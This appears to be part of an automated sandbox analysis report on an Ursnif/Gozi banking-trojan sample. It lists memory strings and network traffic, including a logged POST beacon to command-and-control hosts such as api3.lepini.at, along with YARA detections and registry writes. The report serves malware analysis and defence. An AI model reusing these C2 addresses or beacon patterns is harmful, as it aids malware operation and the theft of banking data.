          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: pfen Sie Ihr Skype-Konto und Ihr Microsoft-Konto.",continueButtonText:"Weiter",learnMoreText:"Hilfe",learnMoreUrl:"https://support.skype.com",callMessageText:"Anruf",fileMessageText:"Datei gesendet",videoMessageText:"Videonachricht",contactMessageText:"Kontakt gesendet"}],jsskype:[{},{}],facebookLite:[{},{likeUrl:"https://www.facebook.com/msnch"}],twitter:[{header:"Twitter",content:"Rufen Sie Ihre Twitter-Updates ab",footerText:"Anmelden",footerUrl:"https://twitter.com",requestTimeout:"10000",taskLinks:""},{header:"Tweets",headerUrl:"https://twitter.com",content:"Laden ...",noContent:"Ihre Timeline ist derzeit leer",errorMessage:"Anmelden bei Twitter nicht m equals www.twitter.com (Twitter)
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: ter erneut.",viewInboxErrorMessage:"Wenn beim Anzeigen Ihres Posteingangs weiterhin ein Problem auftritt, besuchen Sie",taskLinks:"Verfassen|https://outlook.live.com/mail/deeplink/compose;Kalender|https://outlook.live.com/calendar",piiText:"Read Outlook Email",piiUrl:"http://www.hotmail.msn.com/pii/ReadOutlookEmail/"}],office:[{header:"Office",content:"Zeigen Sie Ihre zuletzt verwendeten Dokumente an oder erstellen Sie kostenlos mit Office Online ein neues.",footerText:"Anmelden",footerUrl:"[[signin]]",ssoAutoRefresh:!0,taskLinks:"Word Online|https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel Online|https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway|https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoint Online|https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site"},{header:"Aktuelle Dokumente",headerUrl:"https://onedrive.live.com/#qt=mru",content:"Wird geladen ...",noContent:"Dieser Ordner ist leer. Klicken Sie unten, um ein neues Dokument zu erstellen.",errorMessage:"Keine Verbindung mit Office Online m equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: www.msn.com
          Source: unknownHTTP traffic detected: POST /api1/cAvNUqMpc/IdHHapeYD4SHdVXH3mAd/peW1DdulTWxo4jVdhE_/2BclvubCIZEFeHr2parLsi/W8vAuegF9qm1_/2Bc2Uri2/tI_2B7VBmrQkM_2FGOLWJdV/ZevcOT_2F7/aN1O0bRn0Thy1qYaF/CgfK9alhGqne/Nmw4NXJBDJn/P8aNBBkTqkQ37x/zISm_2BHG3rvuQpW_2B7f/WOCiLUCfbgcmsJTv/KTRHMKqR6xGOuzu/qERS7QC2tez7odTnTc/DN55JCA1v/CVUVwlhUlDcO4fFIy9AC/YGj5TohopLY3Qf8uovP/37r2p6OXxSz6q_2FvuXhXL/nUKFbI3z5dXujOWmh/2 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:28:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: {CBE48857-7017-11EB-90E4-ECF4BB862DED}.dat.3.dr, ~DFF92503A57F2E6FA1.TMP.3.drString found in binary or memory: http://api10.laptok.at/api1/gtYC_2BK_2FjCAsja/Qyq2AzjFZWki/EyFB_2F9syK/YEZOamZx4Lsvyb/NcUbBRiZnrBjBY
          Source: {CBE48859-7017-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://api10.laptok.at/api1/jzRoxFaC/VGe9D7ZFmtXM2P4WCtXue9i/9UasgR41C7/sUfUr2FPy8aFKQY_2/Bz_2Bn96rD
          Source: {CBE48855-7017-11EB-90E4-ECF4BB862DED}.dat.3.drString found in binary or memory: http://api10.laptok.at/api1/nH23HHDrgk/10Cw7k0sEsFdP7SDZ/GJzI8RwZt_2F/lJSbcpCS9kd/So9_2FRP7wVauo/K_2
          Source: regsvr32.exe, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: regsvr32.exe, 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: powershell.exe, 00000021.00000003.429199604.000001F9541B6000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: powershell.exe, 00000021.00000003.384916588.000001F95436F000.00000004.00000001.sdmpString found in binary or memory: http://crl.microsof
          Source: regsvr32.exe, 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, regsvr32.exe, 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, powershell.exe, 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, control.exe, 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: de-ch[1].htm.5.drString found in binary or memory: http://ogp.me/ns#
          Source: de-ch[1].htm.5.drString found in binary or memory: http://ogp.me/ns/fb#
          Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: auction[1].htm.5.drString found in binary or memory: http://popup.taboola.com/german
          Source: powershell.exe, 00000021.00000002.473361797.000001F93BC01000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
          Source: msapplication.xml.3.drString found in binary or memory: http://www.amazon.com/
          Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: msapplication.xml1.3.drString found in binary or memory: http://www.google.com/
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: http://www.hotmail.msn.com/pii/ReadOutlookEmail/
          Source: msapplication.xml2.3.drString found in binary or memory: http://www.live.com/
          Source: msapplication.xml3.3.drString found in binary or memory: http://www.nytimes.com/
          Source: msapplication.xml4.3.drString found in binary or memory: http://www.reddit.com/
          Source: msapplication.xml5.3.drString found in binary or memory: http://www.twitter.com/
          Source: msapplication.xml6.3.drString found in binary or memory: http://www.wikipedia.com/
          Source: msapplication.xml7.3.drString found in binary or memory: http://www.youtube.com/
          Source: de-ch[1].htm.5.drString found in binary or memory: https://amzn.to/2TTxhNg
          Source: auction[1].htm.5.drString found in binary or memory: https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;ap
          Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/googleData.json
          Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iab2Data.json
          Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://cdn.cookielaw.org/vendorlist/iabData.json
          Source: de-ch[1].htm.5.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_office&amp;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&amp;mid=46130&amp;u1=dech_mestripe_store&amp;m
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://client-s.gateway.messenger.live.com
          Source: de-ch[1].htm.5.drString found in binary or memory: https://clk.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=21863656
          Source: de-ch[1].htm.5.drString found in binary or memory: https://clkde.tradedoubler.com/click?p=245744&amp;a=3064090&amp;g=24903118&amp;epi=ch-de
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
          Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172
          Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=722878611&amp;size=306x271&amp;http
          Source: de-ch[1].htm.5.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&amp;crid=858412214&amp;size=306x271&amp;http
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
          Source: 55a804ab-e5c6-4b97-9319-86263d365d28[1].json.5.drString found in binary or memory: https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
          Source: powershell.exe, 00000021.00000002.473644124.000001F93BE0D000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: de-ch[1].htm.5.drString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=5e875ab70e43d27d2b9a8191&amp;bhid=5f624df5866933554eb1ec8b&a
          Source: auction[1].htm.5.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%
          Source: auction[1].htm.5.drString found in binary or memory: https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au
          Source: de-ch[1].htm.5.drString found in binary or memory: https://itunes.apple.com/ch/app/microsoft-news/id945416273?pt=80423&amp;ct=prime_footer&amp;mt=8
          Source: de-ch[1].htm.5.drString found in binary or memory: https://linkmaker.itunes.apple.com/assets/shared/badges/de-de/appstore-lrg.svg&quot;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;checkda=1&amp;ct=1613420858&amp;rver
          Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1613420858&amp;rver=7.0.6730.0&am
          Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/logout.srf?ct=1613420859&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
          Source: de-ch[1].htm.5.drString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1613420858&amp;rver=7.0.6730.0&amp;w
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://login.skype.com/login/oauth/microsoft?client_id=738133
          Source: de-ch[1].htm.5.drString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/#qt=mru
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=allmyphotos;Aktuelle
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=mru;Aktuelle
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/?qt=mru;OneDrive-App
          Source: de-ch[1].htm.5.drString found in binary or memory: https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com/about/en/download/
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com;Fotos
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com;OneDrive-App
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://onedrive.live.com?wt.mc_id=oo_msn_msnhomepage_header
          Source: de-ch[1].htm.5.drString found in binary or memory: https://outlook.com/
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://outlook.live.com/calendar
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://outlook.live.com/mail/deeplink/compose;Kalender
          Source: de-ch[1].htm.5.drString found in binary or memory: https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://play.google.com/store/apps/details?id=com.microsoft.amp.apps.bingnews&amp;hl=de-ch&amp;refer
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg
          Source: de-ch[1].htm.5.drString found in binary or memory: https://rover.ebay.com/rover/1/5222-53480-19255-0/1?mpre=https%3A%2F%2Fwww.ebay.ch&amp;campid=533862
          Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-me
          Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-nav
          Source: de-ch[1].htm.5.drString found in binary or memory: https://sp.booking.com/index.html?aid=1589774&amp;label=travelnavlink
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/de-ch/homepage/api/modules/cdnfetch&quot;
          Source: imagestore.dat.3.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB12jAN6.img?h=27&amp;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cEP3G.img?h=27&amp;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&amp;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1dHqH1.img?h=368&amp
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&amp;w
          Source: de-ch[1].htm.5.drString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&amp;w
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://support.skype.com
          Source: de-ch[1].htm.5.drString found in binary or memory: https://twitter.com/
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://twitter.com/i/notifications;Ich
          Source: de-ch[1].htm.5.drString found in binary or memory: https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;a
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=11518&amp;awinaffid=696593&amp;clickref=dech-edge-dhp-infopa
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-edge-dhp-river
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.awin1.com/cread.php?awinmid=15168&amp;awinaffid=696593&amp;clickref=de-ch-ss&amp;ued=htt
          Source: iab2Data[1].json.5.drString found in binary or memory: https://www.bidstack.com/privacy-policy/
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: ~DFD10CE9AADA4C4DBB.TMP.3.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp$
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp&amp;item=deferred_page%3a1&amp;ignorejs=webcore%2fmodules%2fjsb
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/modules/fetch&quot;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata&quot;
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/coronareisen
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/politik/der-spaziergang-kam-nicht-weit/ar-BB1dEdnO?ocid=hploca
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/politik/interview-haben-sie-angst-dass-jeder-der-eine-polizeim
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/nachrichten/regional
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/40-000-franken-f%c3%bcr-quartier-projekte-in-wipkingen/ar-BB1dH
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/der-fcz-gewinnt-%c3%a0-la-rizzo/ar-BB1dG2Q3?ocid=hplocalnews
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/finanzdirektion-lehnt-%c3%bcberraschend-viele-h%c3%a4rtefallges
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/interview-sicherheitsdirektor-mario-fehr-90-prozent-der-abgewie
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/observierung-polizei-news-schulen-wohnungen-dar%c3%bcber-stimmt
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/robin-leone-st%c3%bcrmt-wieder-f%c3%bcr-kloten/ar-BB1dHHnA?ocid
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/verst%c3%b6sst-die-nationalit%c3%a4ten-initiative-der-svp-gegen
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com/de-ch/news/other/wo-die-liebe-wohnt/ar-BB1dFEAE?ocid=hplocalnews
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.msn.com?form=MY01O4&OCID=MY01O4
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&amp;auth=1&amp;wdorigin=msn
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_d
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_shop_de&amp;utm
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skype.com/
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/de
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/de/download-skype
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=
          Source: de-ch[1].htm.5.drString found in binary or memory: https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002
          Source: iab2Data[1].json.5.drString found in binary or memory: https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json
          Source: iab2Data[1].json.5.drString found in binary or memory: https://www.stroeer.de/fileadmin/de/Konvergenz_und_Konzepte/Daten_und_Technologien/Stroeer_SSP/Downl
          Source: 85-0f8009-68ddb2ab[1].js.5.drString found in binary or memory: https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.3:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49744 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49742 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49745 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49743 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.3:49747 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 2156, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

          E-Banking Fraud:

          barindex
          Yara detected UrsnifShow sources
          Source: Yara matchFile source: 00000001.00000003.336276523.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336080557.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336180979.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336303683.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.343871778.00000000050CB000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.455040534.00000000042F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336209770.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336248371.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.406882710.0000000004330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336157909.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000003.336112691.0000000005248000.00000004.00000040.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: control.exe PID: 2156, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3732, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 6708, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000026.00000003.420376736.000001A5E0F30000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000021.00000003.428480646.000001F9546C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Source: 00000026.00000002.464915515.0000000000DEE000.00000004.00000001.sdmp, type: MEMORYMatched rule: Win32.Gozi Author: CCN-CERT
          Writes or reads registry keys via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
          Writes registry values via WMIShow sources
          Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
